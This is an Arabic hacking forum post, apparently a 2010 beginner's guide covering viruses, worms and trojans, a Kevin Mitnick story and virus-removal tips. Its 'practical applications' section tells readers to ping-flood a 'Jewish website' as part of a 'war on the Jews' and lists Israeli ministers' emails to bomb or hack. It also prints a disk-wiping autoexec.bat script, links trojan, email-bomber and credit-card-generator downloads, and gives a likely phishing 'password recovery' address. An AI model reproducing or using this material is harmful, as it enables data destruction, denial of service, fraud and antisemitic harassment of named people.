فضيحة اخري لميكروسوفت ولكنها انكرتها بشدة ولازلت , وتتعلق بأننظمة التشغيل حيث الداعي اندرو فيرنانديز - كبير العلماء في شركة كبريتنمي لانتاج بركجيات الأمن - اكتشاف باب خلفي أو مفتاح يسمح لوكالة الامن القمي ان اس اي بالوصول الى اجهزة الكمبيوتر والتجسس عليها .

ويقول فيرنانديز الذي نشر برنامجا على موقعة يدعي أنة يعطل عمل المفتاح المزعوم أنة يوجد مفتاحين مرفقين على كل نسخ ويندوز يمنحان أطراف خارجية امكانية الوصول الى اجهزة المستخدمين لتركيب مكونات خاصة بلأمن دون موافقة المستخدمين . وتستخدم مايكروسوفت المفتاح الاول بوضع نماذج خدماتها الأمنية , بينما بقي استخدام النفتاح الثاني مجهول الهوية حتي خرج فرنانديز بتصريحة .

ولم ترد وكـــالة ان اس ان على الخبر بعد محاولة استطلاع رايعا , ولكن مايكروسوفت تؤكد ان التشريعات الأمريكية تقتضي أن تراجع وكالة اي اس ان كافة البرامج للتصدير فوجود هذا الرمز على المفتاح يدل على أن المنتج طابق لمعايير الوكالة

## ثالثا ##

Realjukeebox اعترف الشركة أن برنامجهاااااااا

الذي يستخدم ه حوالى 13.5 مليون كستخدم في العالم يقوم بجمع معلومات عما يستمع اليه لمستخدمون وما يسجلونة .

وقد بررت الشركة ذالك الفعل برغبة الشركة في دلااسة المعلومات التي ترد عن المستخدمين ومن ثم تكييف الخدمات الخاصة بكل مستخدم . كما نفت الشركة أن يكون هذا الفعل خرقا للخصوصية وذلك - على حد قولها - لأن البيانات التي جمعت لم تخزن ولم تنقل لشركة اخري .

ويقوم البرنامج بفحص القرص الصلب وعمل تقرير يحتوي على عدد الأغاني المخزنة وهيئة الملفات ونوع الموسيقي المفضل للمستخدم ونوع مشفل الملفات الصوتية الذي يستخدمة ..

رابعا :تضمن برنامج اي اس كيو برنامجا من نوع حصان طرودة يسمح بأجراء عمليات اختراق , وقد دمج هذا البرنامج في ملف التركيب الاصلى للبرنامج الأصلى الذي تصدرة الشركة الاسرئيلية..

Norton Anti Virus وقد اكتشاف هذا البرنامج الخبيث برنامج

ولكن الشركة الاسرئيلية نفت بشدة تضمين هذا البرنامج في ملف التركيب الاصلي , وادعت أنة قد دس فية بدون علمها . ولكن كثير من المحللين يشكون في التراهة الأمنية للشكة المصممة , ويقولون أنها ضمنت هذا البرنامج بشكل مقصود ولأغراض خفية خفية خفية ., وهذا غيض من فيض لم يكتشف حتي الان .

الفيـــــــــــــــــــرس:-



ماهي الفيروسات؟

فيروسات الكومبيوتر هي برامج تتم كتابتها بغرض إلحاق الضرر بكومبيوتر آخر، أو السيطرة عليه، تمت كتابتها بطريقة معينة. سُمّيت بالفيروسات، لأنها تشبه تلك الكائنات المتطفلة في صفتين رئيسيتين:

تحتاج فيروسات الكومبيوتر دائماً إلى ملف عائل تعيش متستّرةً فيه:
فالفيروسات، دائماً تتستر خلف ملف آخر، و لكنها تأخذ زمام السيطرة على البرنامج المصاب. بحيث أنه حين يتم تشغيل البرنامج المصاب، يتم تشغيل الفيروس أولاً.
تستطيع فيروسات الكومبيوتر أن تنسخ نفسها:
تتم كتابة هذه البرامج المؤذية بحيث تقوم بنسخ نفسها فوراً بمجرّدتشغيل البرنامج المصاب. و هي تنسخ نفسها للأقراص الأخرى، فإذا كان الكومبيوتر مصاباً ووضعت فيه قرصاً مرناً، يتم نسخ الفيروس اوتوماتيكياً للقرص المرن. و نظراً لهذه الخاصية في الفيروسات، تجد أن القرص المصاب يعطيك علامة أنه ممتلئ تماماً برغم أنك لم تقم بتخزين غير ملفات ذات حجم صغير.

ما الفرق بين الدوده والتورجان والفيرس

الدودة: تصيب الدودة الكمبيوترات الموصلة بالشبكة بشكل اوتوماتيكي و من غير تدخل الانسان و هذا الامر يجعلها تنتشر بشكل اوسع و اسرع عن الفيروسات . الفرق بينهم هو ان الديدان لا تقوم بحذف او تغيير الملفات بل تقوم بتهليك موارد الجهاز و استخدام الذاكرة بشكل فظيع مما يؤدي الى بطء ملحوظ جدا للجهاز , و من المهم تحديث نسخ النظام المستخدم في الجهاز كي يتم تجنب الديدان.

ومن المهم عند الحديث عن الديدان الإشارة إلى تلك التي تنتشر عن طريق الإيميل. حيث يرفق بالرسالة ملفاً يحتوي على دودة، و عندما يشغّل المرسل إليه الملف المرفق، تقوم الدودة بنشر نفسها إلى جميع الإيميلات الموجودة في دفتر عناوين الضحية.


التروجان: وهو عبارة عن برنامج يغري المستخدم باهميته او بشكله او باسمه ان كان جذاباً, و في الواقع هو برنامج يقوم بفتح باب خلفي ان صح التعبير بمجرد تشغيله , و من خلال هذا الباب الخلفي يقوم المخترق باختراق الجهاز و بامكانه التحكم بالجهاز بشكل كبير حتى في بعض الاحيان يستطيع القيام بامور , صاحب الجهاز نفسه لا يستطيع القيام بها , و هذا لا يرجع لملف التروجان, لكن ملف التروجان هو الذي فتح للمخترق الباب ان صح التعبير بتشغيله اياه.


الفيروس: كما ذكرنا , الفيروس عبارة عن برنامج صمم لينشر نفسه بين الملفات و يندمج او يلتصق بالبرامج. عند تشغيل البرنامج المصاب فانه قد يصيب باقي الملفات الموجودة معه في القرص الصلب او المرن, لذا الفيروس يحتاج الى تدخل من جانب المستخدم كي ينتشر , بطبيعة الحال التدخل عبارة عن تشغيله بعد ان تم جلبه من الايميل او تنزيله من الانترنت او من خلال تبادل الاقراص المرنة.
كيف تعمل الفيروسات؟
في الواقع يقوم الفيروس في حالة إصابة الملف بإضافة نفسه في بداية أو نهاية الملف المصاب، دون أن يقوم فعلياً بأي تغيير في مكوّنات الملف الأصلية. لننظر للصورة التالية التي توضّح شكل البرنامج غير المصاب بفيروس:

نلاحظ أنه عند استدعاء البرنامج فإنه يعمل بشكل طبيعي.

والآن لنتصوّر أنه تم اصابة البرنامج بفيروس. في الواقع يقوم الفيروس بلصق نفسه في البرنامج كما أسلفنا دون أن يغير في محتويات الملف شيئاً. و طريقة اللصق تكون، إما أنه يقوم بلصق نفسه في بداية البرنامج، بحيث يتم تشغيله هو قبل البرنامج نفسه:




وقد تكون طريقة التحاق الفيروس بالملف بأن يضع نفسه في نهاية البرنامج المصاب. و يضع علامة في بدايته، هكذا:-



إن هذا الفيروس، يختبئ في نهاية الملف المصاب، و يضع في مقدّمة البرنامج مؤشّراً بحيث أنه عندما يتم استدعاء البرنامج و تشغيله، يحوّل السيطرة للفيروس بدلاً من تشغيل البرنامج.
وفي الحالتين قد يعود الفيروس بعد الانتهاء من تنفيذ عمله المؤذي لتشغيل البرنامج، و لكنه قد لا يعود أيضاً. و يسبب أضراراً جسيمة للجهاز.


أنواع الفيروسات:-

هناك الآف من الفيروسات المنتشرة عبر الانترنت , لكن اغلبها ما يقع تحت هذه النقاط الستة:

1: فيروسات بدء التشغيل او Boot Sector Virus
هذا النوع من الفيروسات يصيب قطاع الاقلاع في الجهاز , و هو المكان المخصص الذي يتجه اليه الكمبيوتر في بداية تشغيل الجهاز. و هذا النوع من الفيروسات قد يمنع المستخدم من الوصول الى النظام ويمنعه من اقلاع الجهاز.

2: فيروس الملفات او File Virus
يصيب البرامج عادة , و ينتشر بين الملفات الاخرى و البرامج الاخرى عند تشغيله.

3: فيروس الماكرو او Macro Virus
هذه الفيروسات تصيب برامج الميكروسوفت اوفيس مثل الوورد و الاكسل, و تعتبر ذات انتشار واسع جدا تقدر ب 75% من عدد الفيروسات الموجودة. يقوم هذا النوع من الفيروسات بتغيير بعض المستندات الموجودة في القرص الصلب و خصوصا الوورد , قد تجد بعض التصرفات الغير منطقية في بعض الاحيان مثل طلب باسوورد لفتح ملف تعرف انك لم تضع عليه باسوورد , و ايضا تجد بعض الكلمات قد تغير مكانها و اضيفت كلمات جديدة لا علاقة لها بالموضوع . هي اساساً ليست ضارة, لكنها مزعجة نوعاً ما و قد تكون مدمرة احيانا!

4: الفيروس المتعدد الاجزاء او Multipartite Virus
و هو الذي يقوم باصابة الملفات مع قطاع الاقلاع في نفس الوقت و يكون مدمراً في كثير من الاحيان اذا لم تتم الوقاية منه.

5: الفيروس المتطور او Polymorphic Virus
هي فيروسات متطورة نوعا ما حيث انها تغير الشفرة كلما انتقلت من جهاز الى آخر. نظريا, يصعب على مضادات الفيروسات التخلص منها لكن عمليا و مع تطور المضادات فالخطر اصبح غير مخيف.

6: الفيروس المختفي اوStealth Virus

تخفي نفسها بان تجعل الملف المصاب سليما و تخدع مضادات الفيروسات بان الملف سليم و ليس مصاباً بفيروس. مع تطور مضادات الفيروسات اصبح من السهل كشف هذا النوع.


ماهي العلامات الشائعة لوجود فيروس في الجهاز:

بطء الجهاز الشديد، بما لا يتناسب مع عدد البرامج التي تعمل في نفس الوقت.
امتلاء القرص بما لا يتناسب مع عدد و حجم الملفات الموجودة عليه.
ظهور مربّعات حوار غريبة اثناء العمل على الجهاز.
اضاءة لمبة القرص الصلب أو القرص المرن، دون أن تقوم بعملية فتح أو حفظ ملف.
لابد أن تعرف أن هذه العلامات لا تعني بالضرورة وجود فيروس، فقد يكون بعضها بسبب مشكلة في عتاد الجهاز مثلاً.

آثار الاختراق:-

الاستيلاء على مواقع ويب الموجودة على الشبكة وتغيير محتوياتها باعطاء معلومـــــــات مغلوطة عن الموقع ,أو من باب التحدي ومن ثم التهكم بعد نجاح العملية ,أو باعطاء اراء مخالفة لما كان يطرجة الموقع.

السطو بغرض الكسب كتحويل الحسابات داخل البنوك ,او الحصول على خدمات مجانية ,أوأي معلومات ذات مكاسب مالية ,كارقام البطاقات الائتمان .وتصل الخطورة احيانا الى نشر هذه البيانات على الشبكة مما يضاعف من الخسائر المحتملة

.اقتناص كلمات السر التي يستخدمها الشخص للحصول على خدمات مختلفة كالبريد الاكتروني ,والحصول على خدمة النفاذ الى الانترنت فيلاحظ الضحية انتهاء ساعاتة دون أ، يستخدمها , وكذلك انتحال الشخصية في منتديات النقاش والدردشة ومن ثم طرح افكار معاكسة لما كان يطرح ,او محاولة الدخول الى البريد الاكتروني دون ان يستطيع ذلك.

تطبيقات عمليه:-*

فيما يلى اهم التطبيقات العمليه على ما سبق:-

كيفيه تدمير موقع يهودى شارك فى الحرب على اليهود(مهم)
كيف تصنع فيرس كيفيه استرجاع ايميلك المسروق


كيفيه تدمير موقع يهودى:-

1-افتح الدوس
2-اكتب
(ping http://www.xxx.com/ -t)

لا تكتب الاقواس
xxx اسم الموقع

لاحظ المسافات بين
1-ping و اسم الموقع
2-اسم الموقع و -t

ستلاحظ تكرر ظهور جمل مع اي بي الموقع
هذا يدل على ان الدوس يرسل رسائل الى الموقع فيرد عليه الى ان يتوقف الموقع عن العمل

ملاحظة:يجب تنفيذ هذه الطريقة في اكثر من نافذة للدوس
و ان يشترك اكثر من شخص حتى تكون الطريقة مجدية و سريعة المفعول







شارك فى الحرب على اليهودـ-



شارك بتدمير هذه الايميلس او اختراقها ان استطعت والله الموفق.



barak@pmo.gov.il

ايميل ايهود باراك

sar@moc.gov.il

ايميل وزير الاتصالات بينيامين اليازر

sar@mod.gov.il

ايميل ايهود باراك وزير الدفاع ايضاً

sar@education.gov.il

وزارة التعليم

sar@environment.gov.il

وزيرة البيئة دايا ايتزك

sar@mof.gov.il

وزير الاقتصاد افراهام شوكت

sar@mofa.gov.il

دايفد ليفي وزير الخارجية على ما اعتقد

sar@matat.health.gov.il

وزير الصحة رابي شلومو بنزري

sar@moch.gov.il

بينيامين اليازر وزير الإسكان

sar@moia.gov.il

يولي تامر وزير الهجرة

sar@moit.gov.il

ران كوهين وزير او وزيرة التجارة والصناعة

sar@moin.gov.il

ناتان شرنسكي وزير الداخلية

sar@mops.gov.il

وزير الامن الداخلي شلومو بن عامي

sar@justice.gov.il

وزير العدل يوسف بيلين واللي ماله داعي

sar@molsa.gov.il

رانان موهن وزير الراحة والعمل

sar@mni.gov.il

ايلياهو سوسا وزير البنية التحتية

sar@religions.gov.il

رابي يتزكاه وزير الدين

minister@most.gov.il

ماتان فيالي وزير الرياضة والثقافة والعلم

sar@tourism.gov.il

امنون بينكي شاهاك وزير السياحة

sar@mot.gov.il

امنون بينكي شاهاك وزير الاتصالات



كيف تصنع فيرس:-

افتح صفحه نوت باد واطبع ه>ا الكود

echo off@

cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat


ثم اكتب اسم الملفautoexec.bat

ولا ينقص لتشغيله سوى ضغطتين بزر الماوس ثم يكون الدرايف سى ابيض تماما وستكتشف ه>ا ان كان لديك سيستم اخر.

كيفيه استرجاع ايميلك المسروق:-

كثرت في الآونة الأخيرة سرقة الايميلات ...... والمشكلة ان السبب في فقدان أو سرقة الايميل هي ظهور العديد من البرامج المخصصه لسرقه الإيميل وهي التي تقوم بإرسال ملفات التجسس عن طريق الماسنجر أو الايميل وعندما تستقبلها تقوم بسرقة جميع كلمات السر من على جهازك سواء للإيميل أو حتى إشتراكك في الانترنت وهناك ايضا برامج تقوم بتخمين كلمات السر وأصبح الجميع قادر على سرقت الايميلات وليس فقط الهاكرز كما كان في السابق.
لذا يجب تغيير كلمة السر للأيميل إلى حروف وأرقام وعلامات أو شرطات كالتالي b89_hy6_u9s لكي يصعب على برامج التخمين الحصول على كلمة السر.
أما بالنسبة للأخوان اللي أنسرقت ايميلاتهم او فقدوا كلمة السر فهناك طريقة سهلة ومجربه وناجحة 100% بدون برامج وبدون تعب كل ماعليك فعله هو التالي:

تقوم بإرسال رسالة إلى شركة الهوتميل وهو
service_x@hotmail.com <mailto:service_x@hotmail.com>

وتكتب عنوان الرسالة:
PW VERIFICATION INFO ENCLOSED

وتملأ هذا النموذج

first mane : أسمك الأول
- last mane : أسمك الأخير
- Sign-in name : ايميلك المسروق
- Country/region : الدولة
- State : المدينه
- Zip or postal code : رقم الكود(رقم كود السعودية966)
- Approximate date of last successful sign-in or approximate date of account registration : تاريخ آخر يوم فتحت إيميلك
- The name of your ISP :
- As many "old" outdated passwords you used in the past as you can remember وهنا تكتب كلمات السر القديمة التى تتذكرها

وبعد الإنتهاء ....تقوم بإرسالها
اذا كانت البيانات التى ارسلتها مقنعه سيرسلون رساله بعد ساعة أو بالكثير 3 ساعات وبها كلمة السر



برامج هاكر انصح بها:-





برنامج للحصول على اى بى من تراسله
http://members.nbci.com/snsr4/ICOwnage-.zip
-------------------------------------------
يحدث اصوات غريبه فى جهاز من تراسله
http://members.nbci.com/snsr4/idb-.zip
--------------------------------------------
يخرج لك اى بى من تراسله
http://members.nbci.com/snsr4/isoaq-.zip
--------------------------------------------

كراك لباسورد سب سفن 1.9
http://portwolf.hack3r.com/zips/subpass.zip
------------------------------------------
جميع اصدارات سب سفن
http://portwolf.hack3r.com/zips/sub710.zip
http://portwolf.hack3r.com/zips/sub71.3.zip
http://portwolf.hack3r.com/zips/sub71.5.zip
http://portwolf.hack3r.com/zips/sub71.7.zip
http://portwolf.hack3r.com/zips/sub71.8.zip
http://portwolf.hack3r.com/zips/sub7server2.zip
http://portwolf.hack3r.com/zips/subseven1.9.zip
http://portwolf.hack3r.com/zips/s7a.zip
http://portwolf.hack3r.com/zips/subseven2.0.zip
http://portwolf.hack3r.com/zips/sub721a.zip
http://portwolf.hack3r.com/zips/sub72.1gold.zip
http://portwolf.hack3r.com/zips/sub7bonus.zip

جميع اصدارات نت بص
http://portwolf.hack3r.com/zips/netbusfirst.zip
http://portwolf.hack3r.com/zips/netbus1.2.zip
http://portwolf.hack3r.com/zips/netbus1.53.zip
http://portwolf.hack3r.com/zips/netbus1.6.zip
http://portwolf.hack3r.com/zips/netbus1.7.zip
http://portwolf.hack3r.com/zips/netbus2.0.zip
http://portwolf.hack3r.com/zips/nbpro201.zip
برامج صنع ارقام الفيزا
http://goldeneyeproject.8k.com/cmaster4.zip
http://goldeneyeproject.8k.com/cardpro.zip
http://www.toxictears.com/files/creditcard/ccmaster.zip
http://goldeneyeproject.8k.com/cprob.zip
http://goldeneyeproject.8k.com/cwizard.zip
http://goldeneyeproject.8k.com/fraud3r.zip

برامج تفجير الايميل
Kaboom 3.0
http://www.smarthack.com/files/kaboom3.zip

برنامج صدام حسين
http://www.gizba.com/x/bahar/sadam.zip
u برنامج اختراق عربى
http://www.geocities.com/eljehad/4u.zip
---------------------------------------------
legion
http://packetstormsecurity.org/groups/rhino9/legion.zip
crm mobile فيروس للجوال
http://www.geocities.com/shad_gad/cmmobile.zip
--------------------------------------------------
change لتغيير امتداد الباتش
http://www.geocities.com/shad_gad/change.zip
--------------------------------------------------
لامطار الجوال بالرسائل icq sms
http://www.geocities.com/shad_gad/IcqSms.zip

فلودرس(وعد الحر دينٌ عليه)


فلودر للشات روم
http://members.nbci.com/snsr4/push2-.zip
-----------------------------------------
فلودر
http://members.nbci.com/snsr4/icqflood95-.zip
-----------------------------------------
فلودر
http://members.nbci.com/snsr4/mouse-.zip
---------------------------------------


مواقع انصح بها:-


http://www.elhacker.net/
http://www.hackermoon.com
Exploits Site
http://www.packetstormsecurity.org
http://www.hack.co.za
http://www.DarkCode.com
http://www.r00tabega.org
http://www.Bugtraq.info
http://www.rootshell.com
http://www.securityfocus.com
http://www.insecure.org
http://get.your.exploits.com
http://www.rootshell.com
http://www.linux.com.cn/hack.co.za


نظرة المجتمع الى الهاكر:-

قالو عن الهاكر:-

** هو الشخص الذي يستمتع بتعلم لغات البرمجة وأنظمة التشغيل الجديدة **

https://nets.ahlamontada.com

2ماهو الهكر .... كيف تصبح هكر... Empty رد: ماهو الهكر .... كيف تصبح هكر... الثلاثاء فبراير 02, 2010 2:17 pm

mohammed abusabah

mohammed abusabah
Admin

**هو الشخص الذي يستمتع بعمل البرامج اكثر من تشغيلها ويحب ان يتعمق فيها ويتعلم المزيد عنها **

**هو الشخص الذي يؤمن بوجود أشخاص اخرين يستطيعون القرصنة **

**هو الشخص الذي يستطيع ان يصمم ويحلل البرامج او انظمة التشغي**

**هو الشخص خبير بلغة البرمجة ما او نظام تشغيل معين **



انتهى بحمد الله الجزء الاول ويليه الجزء الثانى







قصة اعظم هاكر على مر التاريخ........





كيفن ميتنيك، ما إن يضع يديه على لوحة مفاتيح الكمبيوتر، حتى يجد نفسه مشدوداً، لتحطيم الأسوار والدفاعات الحصينة، لمؤسسات يرغب في الوصول إلى خزائن أسرارها. وقد نجح لمدة ثمانية عشر عاماً في اختراق عشرات المؤسسات، بدءاً من شركة الهاتف المحلية لمدينته، وصولاً إلى البنتاجون، مما جعله أشهر مخترق لشبكات الكمبيوتر، في التاريخ. منذ الصغر وشرنقة من مشاعر الوحدة و الإحباط تحاصر كيفن. وقد عمق انفصال والديه هذه المشاعر، وزاد عليها عدم الاستقرار وضيق الوضع المادي. في السابعة عشرة من عمره، بدأت أحوال كيفن تتغير، وخيوط الشرنقة تتقطع، لينطلق منها نسراً جارحاً، سمى نفسه فيما بعد "الكوندور" تيمناً بفيلم Three Days of the Condor
أي أيام الكوندور الثلاثة، الذي تدور قصته حول باحث مطارد من قبل وكالة الاستخبارات الأمريكية فيستخدم خبرته كضابط سابق في سلاح الإشارة في البحرية الأمريكية، للتحكم بشبكة الهاتف، وتضليل مطارديه.
راح ذاك النسر يجوب الفضاء، سنين طويلة، باحثاً عن صيد ثمين.. ولكن وكما يقال" ما طار طير وارتفع، إلا كما طار وقع"! وقع كيفن في الأسر، وهو الآن قابع وراء قضبان السجن، مقيد بالسلاسل ومسجل على أنه خطر جداً، لدرجة أنه أودع السجن لعدة سنين في بلد "الديموقراطية" بدون محاكمة!! كيف..؟
إليكم القصة:

بدأ يزدهر أوائل الثمانينات، استخدام مقاسم الهاتف الرقمية، وشاع استخدام الكمبيوتر الشخصي مع مودم، للتحكم عن بعد، بمقاسم شركات الهاتف. وعلى الرغم من أن كيفن لم يكن من المتفوقين دراسياً، بل كان معدله دون الوسط، إلا أنه برع في الدخول إلى بدالات مؤسسة الهاتف المحلية، وتمكن من الحصول على مكالمات هاتفية مجانية. وتطور الأمر إلى تمكنه من اقتحام عوالم الآخرين، والاستماع إلى مكالماتهم. وأصبح لديه خلال فترة وجيزة، الكثير من المعلومات والأسرار، عن أشخاص كان يختارهم من الأغنياء وذوي السلطة، مما خلق في نفسه الشعور بالقوة والتفوق. وبفضل اهتماماته في هذا المجال تعرف إلى مجموعة من الشباب لهم الاهتمام ذاته، والخبرة في اختراق شبكة الهاتف عن طريق الكمبيوتر، وشكلوا "شلة" أصبحت اجتماعاتها شبه منتظمة، للتداول في وسائل وطرق جديدة في هذا المجال (يطلق على المتخصص في اختراق شبكات الهاتف للحصول على مكالمات مجانية غير قانونية اسم
phreak

يبدو أن الأمر كان مسلياً وممتعاً للشلة، أن يحلوا محل عاملة الاستعلامات، ويقوموا بالرد بدلاً عنها، على طلب بعض الأشخاص لأرقام هواتف، يسألون عنها فتأتيهم إجابات غريبة، مثل: الرقم المطلوب هو "ثمانية، ستة، ثلاثة، تسعة،… ونصف! هل تعلم كيف تطلب الرقم نصف؟!" وعبثوا أيضاً، بهواتف بعض الأشخاص، ووجهوها نحو جهاز تسجيل يقول: "عليك دفع مبلغ عشرين سنتاً قيمة المكالمات لهذا الشهر، وإلا سيقطع الخط"، وكانت هذه الرسالة الصوتية تظهر مباشرة عندما يرفع أولئك سماعة الهاتف.
حتى ذلك الوقت، كان كل ما قامت به الشلة لا يتعدى المزاح لشباب راغبين في المتعة والابتعاد عن الملل، وإن كان بإزعاج الآخرين قليلا.. لكن الإزعاج ما لبث أن تحول إلى أذى، حيث قام أحد أفراد الشلة بتدمير ملفات إحدى شركات الكمبيوتر في سان فرانسيسكو، ولم تتمكن الشرطة من معرفة الفاعل، لأكثر من عام.

في أحد أيام العطل من عام 1981 دخل كيفن واثنان من أصدقائه خلسة، إلى المركز الرئيسي لشركة الهاتف في مدينة لوس أنجلوس، ووصلوا إلى الغرفة التي تحتوي على الكمبيوتر الذي يدير عمليات الاتصال، وأخذوا كتب التشغيل الخاصة به، وقوائم وسجلات تتضمن مفاتيح السر لأقفال الأبواب، في تسعة مراكز أساسية تابعة لشركة الهاتف في المدينة.

وعندما حققت الشرطة المحلية في الأمر، لم تتمكن من كشف الفاعل.. لكن، وبعد سنة، وشت بهم فتاة من أعضاء الشلة، للشرطة، الذين سارعوا لاعتقال الشبان الثلاثة. وحكم على كيفن بقضاء ثلاثة أشهر في سجن الأحداث بتهمة السرقة، وتدمير بيانات عبر شبكة كمبيوتر، كما قضت المحكمة بوضعه بعد ذلك، سنة تحت المراقبة في لوس أنجلوس.

من جهته، حاول مركز الخدمة الاجتماعية تقديم العون له، لتطوير خبراته في مجال الكمبيوتر، والاستفادة منها بشكل شرعي، لكن النتيجة جاءت سلبية، إذ سعى كيفن إلى تعلم أمور مختصرة، وحيل تساعده على ممارسة هوايته باختراق شبكات الكمبيوتر، وهذا ما قاده من انزلاق إلى آخر..!

اعتقل كيفن ثانية عام 1983 من قبل شرطة جامعة شمال كاليفورنيا، بعد ضبطه يحاول استخدام كمبيوتر الجامعة لاختراق شبكة ARPA net للوصول من خلالها إلى البنتاجون وحكمت المحكمة عليه بستة شهور تدريب في إصلاحية للأحداث، في كاليفورنيا..
هل أصلحت الشهور الستة سلوكه؟؟ هيهات!!

فبعد سنوات اعتقل مرة أخرى، بتهمة العبث بكمبيوتر حسابات إحدى الشركات، والغريب في الأمر، أنه بقي رهن الاعتقال لمدة سنة كاملة بدون محاكمة، والأغرب اختفاء ملفه من مركز الشرطة، بدون أي تفسير أو شرح!

هاهو عام 1987 يحمل إشارات تغيير في حياة كيفن، فأثناء تلقيه دروساً في الكمبيوتر، تعرف إلى فتاة، ليرتبط معها بصداقة، ثم يقررا العيش سوية، لكن.. يتضح خلال فترة قصيرة أن هوسه، يقوده من جديد إلى مطب آخر، حيث أدين بسرقة برامج من إحدى شركات البرمجيات في كاليفورنيا، عن طريق الشبكة. وتمكنت الشرطة من اكتشاف ذلك، بتتبع خط الهاتف الذي تمت عن طريقه العملية، والذي أوصلها إلى الشقة التي يعيش فيها مع صديقته.

وتعرض كيفن وقتها للإهانة والضرب على أيدي رجال الشرطة، وقد وضع تحت المراقبة لمدة 36 شهراً، كانت نتيجتها زيادة إحساسه المتعاظم بقدرته الفائقة، فلم يعد يستطيع الخلاص من هذا الشعور الذي يملأ نفسه بالقوة والعظمة.

عام 1988 استحوذت عليه فكرة الحصول على نسخة من نظام تشغيل الميني كمبيوتر لشركة ديجيتال، وذلك من خلال اختراق شبكة "ايزي نت" الخاصة بالشركة. ومن أجل ذلك كان يذهب مساء كل يوم إلى مقر عمل صديقه دييجو، الذي يعمل في قسم دعم البرامج في إحدى شركات الكمبيوتر. وكانا يحاولان لساعات طويلة، الدخول إلى مخابر شركة ديجيتال، التي اكتشف المسؤولون فيها تلك المحاولات، لكنهم فشلوا، على الرغم من كل الجهود التي بذلوها، في تحديد الجهة التي تقوم بهذه المحاولات. ولم يكن منهم إلا أن استعانوا بالشرطة المحلية ومكتب التحقيقات الفيدرالي اللذين عملا بالتعاون مع خبراء ديجيتال، لأيام عديدة على تتبع مصدر محاولات الاختراق، بدون التوصل إلى نتيجة، لأن كيفن كان اتخذ احتياطات ذكية، لمنع اكتشافه، وذلك بأن استخدم جهازي كمبيوتر، الأول يحاول عن طريقه اختراق شبكة ديجيتال، والحصول على نظام تشغيل ، والثاني يراقب مركز مؤسسة الهاتف، ويتتبع المحاولات الرامية لاكتشافه.

كان بإمكان مكتب التحقيقات الفيدرالي اكتشافه بسهولة من خلال تتبع الهاتف الذي يتصل منه، ولكن اختراقه لشبكة الهاتف، مكنه من العبث ببدالتها، وتضليل المحققين. وهذا ما حدث عندما توجهوا مسرعين إلى الشقة التي توصلوا إلى أن محاولات الاختراق تجري بواسطة الهاتف الموجود فيها، ليكتشفوا أنهم كانوا مضللين.

وقد صرف المسؤولون في ديجيتال الكثير من الوقت، في مراقبة أجهزة الشركة، وتطبيق إجراءات جديدة للحماية، وكلفهم ذلك مئات آلاف الدولارات.

وأخيراً، جاء اليوم الذي شهد وقوع كيفن في قبضة رجال ليس بفضل جهودهم، وإنما بوشاية من دييجو، رفيق كيفن في العملية، الذي أثار حنقه مزاح كيفن السمج، حينما اتصل بمديره في العمل ليخبره أن دييجو لديه مشاكل كبيرة مع مصلحة الضرائب.



طرق الحمايه وامن الاجهزه......


اولا الوقاية:- من الضروري عدم حفظ الملفات الشخصية و الصور العائلية و ملفات تحتوي على أرقام سرية و حسابات في القرص الصلب للجهاز إنما حفظها في أقراص مرنة ( Floppy Disk), و الابتعاد عن المواقع المشبوهة عدم تنزيل أي ملفات و برامج منها للاحتمال احتوائها على بعض الفيروسات أو الملفات اللاصقة.

العلاج:- يجب فحص الجهاز بإحدى البرامج المضادة للفيروسات, و عند اكتشافها ملفات تجسس يجب تدوين و تسجيل كل المعلومات عنها على ورقة والاحتفاظ بها.

إن عد الملفات اللاصقة كبير خصوصاً بعد ظهور برامج التجسس الجديدة , لذا قد تكون عملية حذفها صعبة خصوصاً إذا قام الهاكر بتغيير اسم الملف باسم آخر, و لكن سيتم قدر الإمكان تضييق الدائرة على ملف التجسس و حذفه من دفتر التسجيل في الجهاز المصاب و بالتالي منه.

بدخول دفتر التسجيل( Registry) و اتباع التالي:

Start و الضغط على زر run




بكتابة (regedit) في المكان المخصص ستظهر نافذة دفتر التسجيل


و بالضغط على HKEY-LOCAL-MACHINE

ستظهر قائمة أخرى, و باختيار Software


ثم الضغط على زر ال Microsoft ستظهر قائمة أخرى



اختار Windows



ستظهر قائمة أخرى أيضا, بعدها يتم الضغط على Current Version



و أخيراٌ بالضغط على Run



توجد قائمتان

الأولى (Name) و فيها اسم الملفات التي تعمل بقائمة بدء التشغيل للجهاز

الثانية (Data) و فيها معلومات عن الملف و امتداد ه أو البرنامج

من القائمة الثانية نستطيع معرفة ملف التجسس حيث أنه لن تكون له أي معلومات أو امتداد مثل الشكل التالي




فنقوم بحذفه من دفتر التسجيل ثم نقوم بإغلاق النافذة.



الخطوة الأخيرة تكون من خلال الذهاب إلى

Start

Restart at MS- Dos

بالذهاب إلى مكان ملف التجسس الذي غالباً ما يكون ملصوقاً بملفات النظام

C:/windows

أو

C:/windows/system متبوعاً باسم الملف , و بحذفه و بإعادة تشغيل الجهاز نكون قد تخلصنا من الملف.

ثانياً التحديث:-

لعل أشهر برامج مكافحة الفيروسات (أو الحماية من الفيروسات) اثنين، هما برنامج Norton للحماية من الفيروسات http://www.norton.com/، و برنامج McAffee للحماية من الفيروسات: http://www.mcaffee.com/ وهذا الموقع يوفّر خدمة الفحص عبر الانترنت مقابل سعر معقول.

و في كلا البرنامجين ستجد رزّا واضحاً في النافذة الرئيسية لتحديث قائمة الفيروسات. فمثلاً في النورتون ستجده في الشكل التالي:





فلا تنسَ القيام بتحديث قائمة الفيروسات بشكل دوري :-

ثالثاُ ملاحظات هامه:-

تتم اصابة جهازك أو قرصك بفيروس فقط حين تقوم بتشغيل برنامج مصاب.
يمكن لأي قرص أن يصاب بفيروس الـ boot sector.
مجرّد وجودك في الانترنت لا يعرّضك للاصابة بفيروس. و لكنك تصاب به فقط إذا قمت بتنزيل برنامجاً مصاباً من الانترنت و قمت بتشغيله.
لابد أن تحرص على استخدام نسخاً قانونية و مسجّلة من البرامج.
لابد أن تقوم بعمل باك أب لملفاتك المهمة بشكل دوري و ذلك لاسترجاعها في حالة فقدانها لأي سبب تقني أو تعرّضك لفيروس.
لابد أن يكون في جهازك برنامجاً للحماية من الفيروسات، و لابد أن تقوم بتحديثه بشكل وري.
